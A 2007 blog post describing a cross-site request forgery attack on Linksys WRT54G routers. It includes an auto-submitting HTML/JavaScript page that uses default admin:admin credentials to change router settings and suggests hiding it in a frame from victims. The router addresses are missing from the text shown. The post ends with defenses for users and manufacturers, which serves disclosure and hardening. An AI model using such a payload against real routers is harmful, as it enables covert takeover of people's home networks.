Router Hacks

Posted: Sometime in 2007


I'm not sure if this has been done by others before, but here's a cool little hack for breaking into Linksys routers :). There are actually at least two ways to do this including leaving out the username:password part (admin:admin) assuming the user had already logged into the router earlier, this will guarantee you can log into the router remotely.

The way I do it here is assuming the username is admin and the password is admin and assumes the IP address of the router is a linksys and has the IP address At this point all I need to do is submit my form with Javascript into the browser. This example turns on the wireless unit in the router. Technically, nothing stops me from submitting a form to do things such as change the router's password or open up the router to the outside world.

This hack can be modified to affect other routers. I used Linksys because I have one handy :).

Btw, another fun Linksys project is here: Linksys Quadcopter.

Sample Code - How To Turn On Wireless on Linksys WRT54G Rev 5 Routers

Simply make a web page that the user loads in their browser at with code that looks like this. This could all be hidden in a frame or something so the user doesn't know this is happening.

<html> <body onload="hack();"> <script language="javascript"> function hack() { document.forms[0].submit(); } </script> <form name="wireless" action="http://admin:admin@" method="post"> <input name="Mode" value="2" type="hidden"> <input name="channelno" value="6" type="hidden"> <input name="OldWirelessMode" value="0" type="hidden"> </form> </body> </html>

How Users Can Protect Themselves

There are a few things that can be done to protect from this hack.

  • Always change the default password of the router to something not easy to guess
  • After logging into your router and changing settings, make sure you log out. This may require closing the browser so the basic authentication username/password is cleared.
  • Change the default IP address of the router... although I can think of one hack to get around this even.

How Router Manufacturers Can Protect From This

By simply checking the refer header to make sure the form was submitted the above hack could be completely avoided. The refer header could check and make sure the form was submitted from a page that was served by the router. A possibility of getting around that would be maybe to have a hidden frame that loads a page on the router and use javascript to submit it, but I havn't tried it :).

Copyright 1997-2024 - Michael Kohn